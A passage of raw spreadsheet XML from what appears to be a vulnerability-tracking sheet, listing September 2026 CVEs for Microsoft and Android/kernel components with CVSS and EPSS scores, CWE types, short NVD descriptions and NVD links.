execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t></is></c></row><row r="463"><c r="A463" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C463" s="5" t="inlineStr"><is><t>CVE-2026-58846</t></is></c><c r="D463" s="5" t="n"><v>7.8</v></c><c r="E463" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F463" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G463" s="5" t="inlineStr" /><c r="H463" s="5" t="n"><v>0.001</v></c><c r="I463" s="5" t="inlineStr" /><c r="J463" s="5" t="inlineStr" /><c r="K463" s="5" t="inlineStr" /><c r="L463" s="5" t="inlineStr" /><c r="M463" s="5" t="inlineStr" /><c r="N463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q463" s="5" t="inlineStr" /><c r="R463" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S463" s="5" t="inlineStr"><is><t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t></is></c></row><row r="464"><c r="A464" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C464" s="5" t="inlineStr"><is><t>CVE-2026-58874</t></is></c><c r="D464" s="5" t="n"><v>7.8</v></c><c r="E464" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F464" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G464" s="5" t="inlineStr" /><c r="H464" s="5" t="n"><v>0.001</v></c><c r="I464" s="5" t="inlineStr" /><c r="J464" s="5" t="inlineStr" /><c r="K464" s="5" t="inlineStr" /><c r="L464" s="5" t="inlineStr" /><c r="M464" s="5" t="inlineStr" /><c r="N464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q464" s="5" t="inlineStr" /><c r="R464" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S464" s="5" t="inlineStr"><is><t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t></is></c></row><row r="465"><c r="A465" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C465" s="5" t="inlineStr"><is><t>CVE-2026-58941</t></is></c><c r="D465" s="5" t="n"><v>7.8</v></c><c r="E465" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F465" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G465" s="5" t="inlineStr" /><c r="H465" s="5" t="n"><v>0.001</v></c><c r="I465" s="5" t="inlineStr" /><c r="J465" s="5" t="inlineStr" /><c r="K465" s="5" t="inlineStr" /><c r="L465" s="5" t="inlineStr" /><c r="M465" s="5" t="inlineStr" /><c r="N465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q465" s="5" t="inlineStr" /><c r="R465" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S465" s="5" t="inlineStr"><is><t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t></is></c></row><row r="466"><c r="A466" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C466" s="5" t="inlineStr"><is><t>CVE-2026-62697</t></is></c><c r="D466" s="5" t="n"><v>7.8</v></c><c r="E466" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F466" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G466" s="5" t="inlineStr" /><c r="H466" s="5" t="n"><v>0.003</v></c><c r="I466" s="5" t="inlineStr" /><c r="J466" s="5" t="inlineStr" /><c r="K466" s="5" t="inlineStr" /><c r="L466" s="5" t="inlineStr" /><c r="M466" s="5" t="inlineStr" /><c r="N466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P466" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q466" s="5" t="inlineStr" /><c r="R466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S466" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t></is></c></row><row r="467"><c r="A467" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C467" s="5" t="inlineStr"><is><t>CVE-2026-62804</t></is></c><c r="D467" s="5" t="n"><v>7.8</v></c><c r="E467" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F467" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G467" s="5" t="inlineStr" /><c r="H467" s="5" t="n"><v>0.003</v></c><c r="I467" s="5" t="inlineStr" /><c r="J467" s="5" t="inlineStr" /><c r="K467" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L467" s="5" t="inlineStr" /><c r="M467" s="5" t="inlineStr" /><c r="N467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q467" s="5" t="inlineStr" /><c r="R467" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S467" s="5" t="inlineStr"><is><t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t></is></c><c r="T467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t></is></c></row><row r="468"><c r="A468" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C468" s="5" t="inlineStr"><is><t>CVE-2026-62810</t></is></c><c r="D468" s="5" t="n"><v>7.8</v></c><c r="E468" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F468" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G468" s="5" t="inlineStr" /><c r="H468" s="5" t="n"><v>0.002</v></c><c r="I468" s="5" t="inlineStr" /><c r="J468" s="5" t="inlineStr" /><c r="K468" s="5" t="inlineStr" /><c r="L468" s="5" t="inlineStr" /><c r="M468" s="5" t="inlineStr" /><c r="N468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P468" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q468" s="5" t="inlineStr" /><c r="R468" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S468" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t></is></c></row><row r="469"><c r="A469" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C469" s="5" t="inlineStr"><is><t>CVE-2026-68787</t></is></c><c r="D469" s="5" t="n"><v>7.8</v></c><c r="E469" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F469" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G469" s="5" t="inlineStr" /><c r="H469" s="5" t="n"><v>0.002</v></c><c r="I469" s="5" t="inlineStr" /><c r="J469" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K469" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L469" s="5" t="inlineStr" /><c r="M469" s="5" t="inlineStr" /><c r="N469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P469" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q469" s="5" t="inlineStr" /><c r="R469" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S469" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t></is></c><c r="T469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t></is></c></row><row r="470"><c r="A470" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C470" s="5" t="inlineStr"><is><t>CVE-2026-68832</t></is></c><c r="D470" s="5" t="n"><v>7.8</v></c><c r="E470" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F470" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G470" s="5" t="inlineStr" /><c r="H470" s="5" t="n"><v>0.002</v></c><c r="I470" s="5" t="inlineStr" /><c r="J470" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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0" s="5" t="inlineStr" /><c r="M470" s="5" t="inlineStr" /><c r="N470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P470" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q470" s="5" t="inlineStr" /><c r="R470" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S470" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t></is></c></row><row r="471"><c r="A471" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C471" s="5" t="inlineStr"><is><t>CVE-2026-68841</t></is></c><c r="D471" s="5" t="n"><v>7.8</v></c><c r="E471" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F471" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G471" s="5" t="inlineStr" /><c r="H471" s="5" t="n"><v>0.002</v></c><c r="I471" s="5" t="inlineStr" /><c r="J471" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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1" s="5" t="inlineStr" /><c r="M471" s="5" t="inlineStr" /><c r="N471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P471" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q471" s="5" t="inlineStr" /><c r="R471" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S471" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t></is></c></row><row r="472"><c r="A472" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C472" s="5" t="inlineStr"><is><t>CVE-2026-68844</t></is></c><c r="D472" s="5" t="n"><v>7.8</v></c><c r="E472" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F472" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G472" s="5" t="inlineStr" /><c r="H472" s="5" t="n"><v>0.003</v></c><c r="I472" s="5" t="inlineStr" /><c r="J472" s="5" t="inlineStr" /><c r="K472" s="5" t="inlineStr" /><c r="L472" s="5" t="inlineStr" /><c r="M472" s="5" t="inlineStr" /><c r="N472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P472" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q472" s="5" t="inlineStr" /><c r="R472" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S472" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t></is></c></row><row r="473"><c r="A473" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C473" s="5" t="inlineStr"><is><t>CVE-2026-68845</t></is></c><c r="D473" s="5" t="n"><v>7.8</v></c><c r="E473" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F473" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G473" s="5" t="inlineStr" /><c r="H473" s="5" t="n"><v>0.003</v></c><c r="I473" s="5" t="inlineStr" /><c r="J473" s="5" t="inlineStr" /><c r="K473" s="5" t="inlineStr" /><c r="L473" s="5" t="inlineStr" /><c r="M473" s="5" t="inlineStr" /><c r="N473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P473" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q473" s="5" t="inlineStr" /><c r="R473" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S473" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t></is></c></row><row r="474"><c r="A474" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C474" s="5" t="inlineStr"><is><t>CVE-2026-68848</t></is></c><c r="D474" s="5" t="n"><v>7.8</v></c><c r="E474" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F474" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G474" s="5" t="inlineStr" /><c r="H474" s="5" t="n"><v>0.002</v></c><c r="I474" s="5" t="inlineStr" /><c r="J474" s="5" t="inlineStr" /><c r="K474" s="5" t="inlineStr" /><c r="L474" s="5" t="inlineStr" /><c r="M474" s="5" t="inlineStr" /><c r="N474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P474" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q474" s="5" t="inlineStr" /><c r="R474" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S474" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t></is></c></row><row r="475"><c r="A475" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C475" s="5" t="inlineStr"><is><t>CVE-2026-68850</t></is></c><c r="D475" s="5" t="n"><v>7.8</v></c><c r="E475" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G475" s="5" t="inlineStr" /><c r="H475" s="5" t="n"><v>0.002</v></c><c r="I475" s="5" t="inlineStr" /><c r="J475" s="5" t="inlineStr" /><c r="K475" s="5" t="inlineStr" /><c r="L475" s="5" t="inlineStr" /><c r="M475" s="5" t="inlineStr" /><c r="N475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P475" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q475" s="5" t="inlineStr" /><c r="R475" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S475" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t></is></c></row><row r="476"><c r="A476" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C476" s="5" t="inlineStr"><is><t>CVE-2026-68875</t></is></c><c r="D476" s="5" t="n"><v>7.8</v></c><c r="E476" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F476" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G476" s="5" t="inlineStr" /><c r="H476" s="5" t="n"><v>0.002</v></c><c r="I476" s="5" t="inlineStr" /><c r="J476" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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6" s="5" t="inlineStr" /><c r="M476" s="5" t="inlineStr" /><c r="N476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P476" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q476" s="5" t="inlineStr" /><c r="R476" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S476" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t></is></c><c r="T476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t></is></c></row><row r="477"><c r="A477" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C477" s="5" t="inlineStr"><is><t>CVE-2026-68877</t></is></c><c r="D477" s="5" t="n"><v>7.8</v></c><c r="E477" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F477" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G477" s="5" t="inlineStr" /><c r="H477" s="5" t="n"><v>0.002</v></c><c r="I477" s="5" t="inlineStr" /><c r="J477" s="5" t="inlineStr" /><c r="K477" s="5" t="inlineStr" /><c r="L477" s="5" t="inlineStr" /><c r="M477" s="5" t="inlineStr" /><c r="N477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P477" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q477" s="5" t="inlineStr" /><c r="R477" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S477" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t></is></c></row><row r="478"><c r="A478" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C478" s="5" t="inlineStr"><is><t>CVE-2026-68885</t></is></c><c r="D478" s="5" t="n"><v>7.8</v></c><c r="E478" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F478" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G478" s="5" t="inlineStr" /><c r="H478" s="5" t="n"><v>0.003</v></c><c r="I478" s="5" t="inlineStr" /><c r="J478" s="5" t="inlineStr" /><c r="K478" s="5" t="inlineStr" /><c r="L478" s="5" t="inlineStr" /><c r="M478" s="5" t="inlineStr" /><c r="N478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q478" s="5" t="inlineStr" /><c r="R478" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S478" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t></is></c></row><row r="479"><c r="A479" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C479" s="5" t="inlineStr"><is><t>CVE-2026-68888</t></is></c><c r="D479" s="5" t="n"><v>7.8</v></c><c r="E479" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F479" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G479" s="5" t="inlineStr" /><c r="H479" s="5" t="n"><v>0.003</v></c><c r="I479" s="5" t="inlineStr" /><c r="J479" s="5" t="inlineStr" /><c r="K479" s="5" t="inlineStr" /><c r="L479" s="5" t="inlineStr" /><c r="M479" s="5" t="inlineStr" /><c r="N479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P479" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q479" s="5" t="inlineStr" /><c r="R479" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S479" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t></is></c></row><row r="480"><c r="A480" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C480" s="5" t="inlineStr"><is><t>CVE-2026-68890</t></is></c><c r="D480" s="5" t="n"><v>7.8</v></c><c r="E480" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G480" s="5" t="inlineStr" /><c r="H480" s="5" t="n"><v>0.002</v></c><c r="I480" s="5" t="inlineStr" /><c r="J480" s="5" t="inlineStr" /><c r="K480" s="5" t="inlineStr" /><c r="L480" s="5" t="inlineStr" /><c r="M480" s="5" t="inlineStr" /><c r="N480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q480" s="5" t="inlineStr" /><c r="R480" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S480" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t></is></c></row><row r="481"><c r="A481" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C481" s="5" t="inlineStr"><is><t>CVE-2026-68892</t></is></c><c r="D481" s="5" t="n"><v>7.8</v></c><c r="E481" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G481" s="5" t="inlineStr" /><c r="H481" s="5" t="n"><v>0.002</v></c><c r="I481" s="5" t="inlineStr" /><c r="J481" s="5" t="inlineStr" /><c r="K481" s="5" t="inlineStr" /><c r="L481" s="5" t="inlineStr" /><c r="M481" s="5" t="inlineStr" /><c r="N481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P481" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q481" s="5" t="inlineStr" /><c r="R481" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S481" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t></is></c></row><row r="482"><c r="A482" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C482" s="5" t="inlineStr"><is><t>CVE-2026-68896</t></is></c><c r="D482" s="5" t="n"><v>7.8</v></c><c r="E482" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F482" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G482" s="5" t="inlineStr" /><c r="H482" s="5" t="n"><v>0.004</v></c><c r="I482" s="5" t="inlineStr" /><c r="J482" s="5" t="inlineStr" /><c r="K482" s="5" t="inlineStr" /><c r="L482" s="5" t="inlineStr" /><c r="M482" s="5" t="inlineStr" /><c r="N482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P482" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q482" s="5" t="inlineStr" /><c r="R482" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S482" s="5" t="inlineStr"><is><t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t></is></c></row><row r="483"><c r="A483" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C483" s="5" t="inlineStr"><is><t>CVE-2026-69265</t></is></c><c r="D483" s="5" t="n"><v>7.8</v></c><c r="E483" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F483" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G483" s="5" t="inlineStr" /><c r="H483" s="5" t="n"><v>0.002</v></c><c r="I483" s="5" t="inlineStr" /><c r="J483" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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83" s="5" t="inlineStr" /><c r="M483" s="5" t="inlineStr" /><c r="N483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P483" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q483" s="5" t="inlineStr" /><c r="R483" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S483" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t></is></c></row><row r="484"><c r="A484" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C484" s="5" t="inlineStr"><is><t>CVE-2026-69269</t></is></c><c r="D484" s="5" t="n"><v>7.8</v></c><c r="E484" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F484" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G484" s="5" t="inlineStr" /><c r="H484" s="5" t="n"><v>0.003</v></c><c r="I484" s="5" t="inlineStr" /><c r="J484" s="5" t="inlineStr" /><c r="K484" s="5" t="inlineStr" /><c r="L484" s="5" t="inlineStr" /><c r="M484" s="5" t="inlineStr" /><c r="N484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P484" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q484" s="5" t="inlineStr" /><c r="R484" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S484" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t></is></c></row><row r="485"><c r="A485" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C485" s="5" t="inlineStr"><is><t>CVE-2026-69270</t></is></c><c r="D485" s="5" t="n"><v>7.8</v></c><c r="E485" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F485" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G485" s="5" t="inlineStr" /><c r="H485" s="5" t="n"><v>0.002</v></c><c r="I485" s="5" t="inlineStr" /><c r="J485" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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85" s="5" t="inlineStr" /><c r="M485" s="5" t="inlineStr" /><c r="N485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O485" s="5" 